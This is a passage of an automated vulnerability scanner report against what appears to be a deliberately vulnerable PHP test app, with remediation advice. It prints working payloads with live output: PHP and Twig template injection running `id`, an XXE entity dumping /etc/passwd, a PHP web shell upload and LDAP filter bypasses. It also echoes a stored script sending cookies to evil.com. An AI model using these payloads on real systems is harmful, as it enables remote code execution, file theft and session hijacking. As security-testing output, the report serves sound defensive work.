- +15 Damning token in response ("uid=")
- +3 Reproduced by 3 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=ssti&render=348' --data 'RENDER:seed=ggsec{{7*7}}|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=ggsec49|extra_fields=title:ggsectest,engine:twig'Reflection @ offset 41 — via ssti-rce-eval:
<h2><b>ggsecSTORED7</b></h2>GGX457854a049uid=33(www-data) gid=33(www-data) groups=33(www-data) <form meth…
Evidence (live response):
<h2><b>ggsecSTORED7</b></h2>GGX457854a049uid=33(www-data) gid=33(www-data) groups=33(www-data) <form method='POST'> <input name='title' placeholder='Title'> <textarea name='content' placeholder='Content (try: {{7*7}} for Twig)'></textarea> <select name='en…
Remediation
Never build templates from user input — pass user data as bound variables to a sandboxed engine.
- Keep templates static; render user data through the engine's context/variables, never concatenate it into the template source.
- Enable the engine's sandbox/auto-escape (e.g. Jinja2 SandboxedEnvironment, Twig sandbox) and disable dangerous tags/functions.
- Validate/allowlist any value that must influence template selection.
Refs: CWE-1336 · OWASP: Server-Side Template Injection
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET (2nd-order) |
ggsec_test_app.php?page=ssti&render=346 |
RENDER:seed=<?php system('id'); ?>|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=uid=|extra_fields=title:ggsectest,engine:php |
200 |
165ms |
ssti-rce-eval |
— |
| ⚠ VULN |
GET (2nd-order) |
ggsec_test_app.php?page=ssti&render=347 |
RENDER:seed=<?php echo 'ggsec' . (7*7); ?>|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=ggsec49|extra_fields=title:ggsectest,engine:php |
200 |
53ms |
ssti-rce-eval |
— |
| ⚠ VULN |
GET (2nd-order) |
ggsec_test_app.php?page=ssti&render=348 |
RENDER:seed=ggsec{{7*7}}|store=/?page=ssti|storefield=content|render=/?page=ssti&render=NEWID|indicator=ggsec49|extra_fields=title:ggsectest,engine:twig |
200 |
49ms |
ssti-rce-eval |
— |
📄
GGC-XXE-43C
7.5
HIGH
P1
Confirmed
XXE
xml
?page=xxe
2/4 hits
▼
Flow
$_POST body (getRawBody() or $_POST['xml']) → DOMDocument::loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD). Both LIBXML_NOENT and LIBXML_DTDLOAD flags explicitly enable external entity expansion and DTD loading. libxml_disable_entity_loader(false) is called. The parsed result is echoed back via $doc->saveXML(), making this in-band XXE with full file read capability.
CWE / CVSS
CWE-611 XML External Entity Reference ·
CVSS 7.5 HighAn XML parser resolves external entities, enabling local-file disclosure, SSRF, or denial of service.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RC:C
Compliance Impact
A05:2021 – Security Misconfiguration
PCI-DSS v4.0 Req 2.2.1 / 6.2.4 · ISO/IEC 27001:2022 A.8.9 / A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1083 File and Directory Discovery · T1005 Data from Local System
Discovery, Collection
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
92%High confidenceEvidence score 92/100
- +50 Confirmed (strong signal)
- +20 Direct detection (xxe-inband-reflection)
- +15 Damning token in response ("root:x:0:0")
- +2 Reproduced by 2 payload(s)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'http://localhost/ggsec_test_app.php?page=xxe' --data '<?xml version="1.0"?><!DOCTYPE ggsec [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><ggsec>&xxe;</ggsec>'
Reflection @ offset 265 — via xxe-inband-reflection:
…ggsec [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <ggsec>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbi…
Evidence (live response):
…n="1.0"?> <!DOCTYPE ggsec [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <ggsec>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:6…
Remediation
Disable external entity and DTD processing in the XML parser.
- Disable entity loading/DTDs (e.g. libxml_disable_entity_loader, LIBXML_NONET, no LIBXML_NOENT/DTDLOAD).
- Prefer a hardened parser configuration or a non-XML format (JSON) where possible.
Refs: CWE-611 · OWASP: XXE Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ✓ OK |
POST |
ggsec_test_app.php?page=xxe |
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % x SYSTEM "{OOB_HTTP}"> %x;]><root/> |
0 |
0ms |
— |
— |
| ✓ OK |
POST |
ggsec_test_app.php?page=xxe |
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "{OOB_HTTP}">]><root>&xxe;</root> |
0 |
0ms |
— |
— |
🔍
GGC-VULN-431
9.8
CRITICAL
P0
Confirmed
FILE_UPLOAD
upload
?page=file_upload_rce
1/1 hits
▼
Flow
$_FILES['upload'] → pathinfo() extension check against a whitelist that INCLUDES 'php', 'phtml', 'php5' → move_uploaded_file() to __DIR__ . '/uploads/' (web-accessible) with filename md5(uniqid()) . '_' . originalName. PHP files can be directly accessed and executed via /uploads/<hash>_<name>.php. Additionally, if auto_include=1, the uploaded file is immediately include()d. The extension whitelist explicitly allows PHP execution extensions.
Attack Chain
Upload a .php file, then access it at /uploads/<hash>_<filename>.php. Alternatively, set auto_include=1 in POST to trigger include() immediately.
CWE / CVSS
CWE-434 Unrestricted Upload of File with Dangerous Type ·
CVSS 9.8 CriticalA file upload accepts dangerous types / trusts the client MIME, enabling a web shell and remote code execution.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
Compliance Impact
A04:2021 – Insecure Design
PCI-DSS v4.0 Req 6.2.4 (business-logic) · ISO/IEC 27001:2022 A.8.28 / A.8.27 · GDPR Art. 25 + Art. 32 (data protection by design)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
- +50 Confirmed (strong signal)
- +20 Direct detection (upload-rce)
- +15 Damning token in response ("uid=")
- +6 Expected indicator reflected
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'uploads/8a62ceac0d186ffa97e3727b1685f02f_ggsec_shell.php' --data 'upload:ggsec_shell.php'
Reflection @ offset 130 — via upload-rce:
…ec_test_app.php?page=file_upload_rce; GET executed it → 200 uid=33(www-data) gid=33(www-data) groups=33(www-data)
Evidence (live response):
…sec_shell.php to ggsec_test_app.php?page=file_upload_rce; GET executed it → 200 uid=33(www-data) gid=33(www-data) groups=33(www-data)
Remediation
Validate uploads by content (not just extension), store them outside the web root, and never execute them.
- Allowlist by verified MIME/magic bytes AND extension; reject double extensions (shell.php.jpg) and PHP/.phtml/.htaccess.
- Store uploads OUTSIDE the web root (or in a path with execution disabled: php_admin_flag engine off / no handler).
- Generate a random server-side filename; never reuse the client-supplied name or path.
- Serve downloads through a script with Content-Disposition: attachment, not by direct URL to the upload dir.
Refs: CWE-434 · OWASP: Unrestricted File Upload
| Result | Method | URL | Payload | Status | Time | Detection | DB |
🔍
GGC-VULN-C5F
8.2
HIGH
P1
Confirmed
LDAP_INJECTION
user
?page=ldap_injection
1/5 hits
▼
Flow
$_GET['user'] → getParam('user') → $user → string concatenation into LDAP filter "(&(uid=$user)(userPassword=$pass))" without ldap_escape(). The application simulates LDAP authentication and explicitly detects injection metacharacters (* and )) to confirm bypass, echoing 'Auth bypassed! (LDAP injection)' when they appear.
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-90 LDAP Injection ·
CVSS 8.2 HighUntrusted input alters an LDAP filter, allowing authentication bypass or directory data disclosure.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
- +50 Confirmed (strong signal)
- +20 Direct detection (ldap-auth-bypass)
- +15 Damning token in response ("uid=")
- +6 Expected indicator reflected
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ldap_injection'
Reflection @ offset 214 — via ldap-auth-bypass:
…er: (&(uid=*)(userPassword=))</p><p style='color:green'>Auth bypassed! (LDAP injection)</p><form> <input name='user' plac…
Evidence (live response):
…t for a benign value) — filter/bind bypass. <h2>LDAP Auth</h2><p>Filter: (&(uid=*)(userPassword=))</p><p style='color:green'>Auth bypassed! (LDAP injection)</p><form> <input name='user' placeholder='Username'> <input name='pass' type='password' placeholder='Pa…
Remediation
Escape LDAP special characters and use parameterized/allowlisted filters — never concatenate input into a filter.
- Escape filter metacharacters ( ) * \ NUL per RFC 4515 (ldap_escape() / framework equivalent).
- Build filters from a fixed template with bound values; allowlist attribute names.
- Bind with least-privilege service accounts; never authenticate by substituting input into the bind DN/filter.
Refs: CWE-90 · OWASP: LDAP Injection Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php?page=ldap_injection |
* |
200 |
11ms |
ldap-auth-bypass |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=ldap_injection |
*)(uid=*))(|(uid=* |
0 |
0ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=ldap_injection |
admin)(&) |
0 |
0ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=ldap_injection |
*)(& |
0 |
0ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=ldap_injection |
*)(uid=*))(&(uid=* |
0 |
0ms |
— |
— |
🔍
GGC-VULN-76D
7.4
HIGH
Probable
LDAP_INJECTION
pass
?page=ldap_injection
0/3 hits
▼
Flow
$_GET['pass'] → getParam('pass') → $pass → string concatenation into LDAP filter "(&(uid=$user)(userPassword=$pass))" without ldap_escape(). The password field is equally injectable in the LDAP filter string.
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-90 LDAP Injection ·
CVSS 7.4 High (Base 8.2 High)Untrusted input alters an LDAP filter, allowing authentication bypass or directory data disclosure.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:P/RC:R
ⓘ Base 8,2 → Effective 7,4 — probable (E:P/RC:R).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Probable · 🔓 Unauthenticated
Remediation
Escape LDAP special characters and use parameterized/allowlisted filters — never concatenate input into a filter.
- Escape filter metacharacters ( ) * \ NUL per RFC 4515 (ldap_escape() / framework equivalent).
- Build filters from a fixed template with bound values; allowlist attribute names.
- Bind with least-privilege service accounts; never authenticate by substituting input into the bind DN/filter.
Refs: CWE-90 · OWASP: LDAP Injection Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ✓ OK |
GET |
ggsec_test_app.php?page=ldap_injection&user=admin |
*)(&(uid=* |
200 |
49ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=ldap_injection&user=admin |
pass))(|(uid=* |
0 |
0ms |
— |
— |
| ✓ OK |
GET |
ggsec_test_app.php?page=ldap_injection&user=admin |
*)(uid=*))(|(uid=* |
0 |
0ms |
— |
— |
🔍
GGC-VULN-AF8
5.5
MEDIUM
Potential
PROTOTYPE_POLLUTION
JSON body (__proto__/constructor)
?page=prototype_pollution
0/2 hits
▼
Flow
Raw JSON request body → getRawBody() → json_decode($json, true) → $data echoed back as JSON. The PHP endpoint detects __proto__/constructor.prototype keys and prints a warning. This is environment-dependent: requires a downstream Node.js merge (Object.assign/lodash.merge/$.extend); the PHP endpoint only relays JSON. The PHP layer itself does not perform object prototype assignment.
Attack Chain
PHP endpoint accepts and echoes JSON containing __proto__ keys. If this JSON is forwarded to a Node.js service that performs a recursive merge, prototype pollution occurs on the Node side.
Impact
INFORMATION_DISCLOSURE — Conditional
CWE / CVSS
CWE-1321 Prototype Pollution (JS Object.prototype) ·
CVSS 5.5 Medium (Base 6.5 Medium)Attacker-controlled keys pollute Object.prototype in a Node app, corrupting later logic (DoS, auth bypass, RCE).
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N/E:U/RC:U
ⓘ Base 6,5 → Effective 5,5 — potential (E:U/RC:U).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Potential · 🔓 Unauthenticated
Remediation
Block __proto__/constructor/prototype keys in merges and use null-prototype or Map for untrusted data.
- Reject or strip keys named __proto__, constructor, prototype before any recursive merge/assign.
- Use Object.create(null) or a Map for objects built from user input; avoid deep-merge of untrusted JSON.
- Upgrade/patch merge utilities (old lodash.merge, deep-extend, etc.) to versions with proto guards.
- Freeze Object.prototype (Object.freeze) where feasible and validate input against a schema.
Refs: CWE-1321 · OWASP: Prototype Pollution
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ✓ OK |
POST+GET (proto-pollution) |
/merge |
JSONBODY:{"__proto__":{"isAdmin":true}} |
200 |
8ms |
— |
— |
| ✓ OK |
POST+GET (proto-pollution) |
/merge |
JSONBODY:{"constructor":{"prototype":{"isAdmin":true}}} |
200 |
3ms |
— |
— |
🎭
GGC-CSRF-39C
8.1
HIGH
P1
Confirmed
CSRF
username
?page=sqli_second_order (registration form)
1/1 hits
▼
Flow
The POST form at ?page=sqli_second_order registers a new user (INSERT INTO users) without any CSRF token. The form has no hidden _token/_csrf/nonce field. An attacker can craft a cross-site form submission to register arbitrary users.
Attack Chain
Attacker hosts a page with auto-submitting form targeting ?page=sqli_second_order with POST username=attacker&email=evil@test.com
CWE / CVSS
CWE-352 Cross-Site Request Forgery ·
CVSS 8.1 HighA state-changing action lacks an anti-forgery token, so a malicious site can perform it as a logged-in victim.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:H/RC:C
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1 · ISO/IEC 27001:2022 A.8.3 / A.5.15 · GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1539 Steal Web Session Cookie
Credential Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
- +50 Confirmed (strong signal)
- +20 Direct detection (csrf-no-token)
- +15 Damning token in response ("SQLSTATE")
- +6 Expected indicator reflected
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=sqli_second_order' --data 'username=csrf_test_user&email=csrf@test.com'
Reflection @ offset 3 — via csrf-no-token:
<p>User registered! ID: 68</p><p>Related posts query: SELECT * FROM posts WHERE…
Evidence (live response):
…EEP(5)--|' UNION SELECT 1,2,3,4,5--|%'</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of UNION do not have the same number of result columns</p><form method='POST'> <input name='username' placeholder='Username'>…
Remediation
Require an anti-CSRF token on state-changing requests and use SameSite cookies.
- Add per-session/per-request CSRF tokens to all state-changing forms and verify them server-side.
- Set SameSite=Lax/Strict on session cookies; verify Origin/Referer for sensitive actions.
- Never perform state changes via GET.
Refs: CWE-352 · OWASP: CSRF Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
POST |
ggsec_test_app.php?page=sqli_second_order |
username=csrf_test_user&email=csrf@test.com |
200 |
15ms |
csrf-no-token |
SQLite |
🎭
GGC-CSRF-188
8.1
HIGH
P1
Confirmed
CSRF
comment
?page=xss_stored (comment form)
1/1 hits
▼
Flow
The POST form at ?page=xss_stored inserts a comment into the database without any CSRF token. No hidden _token/_csrf/nonce field. An attacker can forge cross-site comment submissions.
Attack Chain
Attacker hosts a page with auto-submitting form targeting ?page=xss_stored with POST post_id=1&author=attacker&comment=spam
CWE / CVSS
CWE-352 Cross-Site Request Forgery ·
CVSS 8.1 HighA state-changing action lacks an anti-forgery token, so a malicious site can perform it as a logged-in victim.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:H/RC:C
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1 · ISO/IEC 27001:2022 A.8.3 / A.5.15 · GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1539 Steal Web Session Cookie
Credential Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (csrf-no-token)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored' --data 'post_id=1&author=csrftest&comment=csrf_injected_comment'
Evidence (live response):
…b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: <script>document.location='http://evil.com/?c='+document.cookie</script></div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='co…
Remediation
Require an anti-CSRF token on state-changing requests and use SameSite cookies.
- Add per-session/per-request CSRF tokens to all state-changing forms and verify them server-side.
- Set SameSite=Lax/Strict on session cookies; verify Origin/Referer for sensitive actions.
- Never perform state changes via GET.
Refs: CWE-352 · OWASP: CSRF Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
POST |
ggsec_test_app.php?page=xss_stored |
post_id=1&author=csrftest&comment=csrf_injected_comment |
200 |
19ms |
csrf-no-token |
— |
🎭
GGC-CSRF-72B
7.3
HIGH
P1
Confirmed
CSRF
content
?page=ssti (post creation form)
1/1 hits
▼
Flow
The POST form at ?page=ssti creates a new post with a user-specified template engine (including 'php' which triggers eval) without any CSRF token. An attacker can forge a post creation with engine=php to achieve RCE via CSRF.
Attack Chain
Attacker hosts a page with auto-submitting form targeting ?page=ssti with POST title=evil&content=<?php system('id'); ?>&engine=php. When an admin later renders it, eval() executes the payload.
CWE / CVSS
CWE-352 Cross-Site Request Forgery ·
CVSS 7.3 High (Base 8.1 High)A state-changing action lacks an anti-forgery token, so a malicious site can perform it as a logged-in victim.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N/E:H/RC:C
ⓘ Base 8,1 → Effective 7,3 — auth-gated (PR:L).
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1 · ISO/IEC 27001:2022 A.8.3 / A.5.15 · GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1539 Steal Web Session Cookie
Credential Access
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (csrf-no-token)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=ssti' --data 'title=csrftest&content=csrfpayload&engine=php'
Evidence (live response):
<h2>Welcome Post</h2><p>Hello <b>world</b></p><form method='POST'> <input name='title' placeholder='Title'> <textarea name='content' placeholder='Content (try: {{7*7}} for Twig)'></textarea> <select name='engine'> <option value='default'>Defaul…
Remediation
Require an anti-CSRF token on state-changing requests and use SameSite cookies.
- Add per-session/per-request CSRF tokens to all state-changing forms and verify them server-side.
- Set SameSite=Lax/Strict on session cookies; verify Origin/Referer for sensitive actions.
- Never perform state changes via GET.
Refs: CWE-352 · OWASP: CSRF Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
POST |
ggsec_test_app.php?page=ssti |
title=csrftest&content=csrfpayload&engine=php |
200 |
51ms |
csrf-no-token |
— |
🔍
GGC-VULN-D0C
9.8
CRITICAL
P0
Confirmed
OUTDATED_COMPONENT
apache 2.4.58 · CVE-2024-38475
HTTP Server / X-Powered-By banner
1/1 hits
▼
Flow
The server banner indicates apache 2.4.58, which the version range for CVE-2024-38475 (fixed in 2.4.60) would cover — version-indicated only, not confirmed exploitable (banner may be backport-patched; vulnerable config/module not verified).
CWE / CVSS
CWE-1104 Use of Unmaintained/Vulnerable Third-Party Component ·
CVSS 9.8 CriticalAn unmaintained / known-vulnerable third-party component is in use; a published CVE may apply.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
Compliance Impact
A06:2021 – Vulnerable and Outdated Components
PCI-DSS v4.0 Req 6.3.1 / 6.3.3 (patch mgmt) · ISO/IEC 27001:2022 A.8.8 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (outdated-component)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php'
Evidence (live response):
Server banner 'Apache/2.4.58' matches CVE-2024-38475 (CWE-22, Critical): mod_rewrite improper output escaping → URL mapped to filesystem (RCE / source disclosure). Affected: version < 2.4.60. VERSION-INDICATED / UNVERIFIED — this is a banner-only match: (1) a backported distro pa…
Remediation
Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build.
- Upgrade to the fixed version listed for the CVE (or a distro build with the backported patch).
- Confirm the real installed version — a backported security fix can leave the banner version unchanged (avoid false positives).
- Suppress the version banner (ServerTokens Prod / expose_php=Off / remove X-Powered-By) to reduce fingerprinting.
- Track dependencies with SCA (composer audit / npm audit / Dependabot) and patch on a schedule.
Refs: CWE-1104 · OWASP A06:2021 Vulnerable & Outdated Components · NVD
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php |
outdated-component |
200 |
0ms |
outdated-component |
— |
🔍
GGC-VULN-637
7.5
HIGH
P1
Confirmed
OUTDATED_COMPONENT
apache 2.4.58 · CVE-2024-38476
HTTP Server / X-Powered-By banner
1/1 hits
▼
Flow
The server banner indicates apache 2.4.58, which the version range for CVE-2024-38476 (fixed in 2.4.60) would cover — version-indicated only, not confirmed exploitable (banner may be backport-patched; vulnerable config/module not verified).
CWE / CVSS
CWE-1104 Use of Unmaintained/Vulnerable Third-Party Component ·
CVSS 7.5 HighAn unmaintained / known-vulnerable third-party component is in use; a published CVE may apply.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RC:C
Compliance Impact
A06:2021 – Vulnerable and Outdated Components
PCI-DSS v4.0 Req 6.3.1 / 6.3.3 (patch mgmt) · ISO/IEC 27001:2022 A.8.8 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed · 🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (outdated-component)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php'
Evidence (live response):
Server banner 'Apache/2.4.58' matches CVE-2024-38476 (CWE-476, High): mod_proxy null-pointer dereference → DoS via malicious backend response headers. Affected: version < 2.4.60. VERSION-INDICATED / UNVERIFIED — this is a banner-only match: (1) a backported distro patch may leave…
Remediation
Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build.
- Upgrade to the fixed version listed for the CVE (or a distro build with the backported patch).
- Confirm the real installed version — a backported security fix can leave the banner version unchanged (avoid false positives).
- Suppress the version banner (ServerTokens Prod / expose_php=Off / remove X-Powered-By) to reduce fingerprinting.
- Track dependencies with SCA (composer audit / npm audit / Dependabot) and patch on a schedule.
Refs: CWE-1104 · OWASP A06:2021 Vulnerable & Outdated Components · NVD
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
GET |
ggsec_test_app.php |
outdated-component |
200 |
0ms |
outdated-component |
— |
⚡
GGC-XSS-FCA
5.4
MEDIUM
P2
Confirmed
XSS
author
crawl-form: ggsec_test_app.php?page=xss_stored&post_id=1
1/1 hits
▼
Flow
A crawler-discovered POST form (not in the SAST plan) reflects a submitted field into HTML without encoding.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (crawl-xss-post)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'crawl-xss-post'
Evidence (live response):
[CRAWL] POST form field 'author' reflects an HTML payload unescaped in the response. <h2>Comments</h2><div class='comment'><b></b>: CSRF_injected_comment</div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='c…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
POST |
ggsec_test_app.php?page=xss_stored&post_id=1 |
crawl-xss-post |
200 |
0ms |
crawl-xss-post |
— |
⚡
GGC-XSS-909
5.4
MEDIUM
P2
Confirmed
XSS
comment
crawl-form: ggsec_test_app.php?page=xss_stored&post_id=1
1/1 hits
▼
Flow
A crawler-discovered POST form (not in the SAST plan) reflects a submitted field into HTML without encoding.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting ·
CVSS 5.4 Medium (Base 6.1 Medium)Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS) · ISO/IEC 27001:2022 A.8.28 · GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed · 👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
- +50 Confirmed (strong signal)
- +20 Direct detection (crawl-xss-post)
- +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'crawl-xss-post'
Evidence (live response):
[CRAWL] POST form field 'comment' reflects an HTML payload unescaped in the response. <h2>Comments</h2><div class='comment'><b></b>: CSRF_injected_comment</div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
- Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
- Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
- Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
| Result | Method | URL | Payload | Status | Time | Detection | DB |
| ⚠ VULN |
POST |
ggsec_test_app.php?page=xss_stored&post_id=1 |
crawl-xss-post |
200 |
0ms |
crawl-xss-post |
— |
🗃
GGC-SQLI-733
8.2
HIGH
P1
Confirmed
SQL_QUERY
email
crawl-form: ggsec_test_app.php?page=sqli_second_order
1/1 hits
▼
Flow
A crawler-discovered POST form (not in the SAST plan) returns a SQL error when a quote is injected into a field.
CWE / CVSS
CWE-89 SQL Injection (SQLite backend) ·
CVSS 8.2 HighSQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
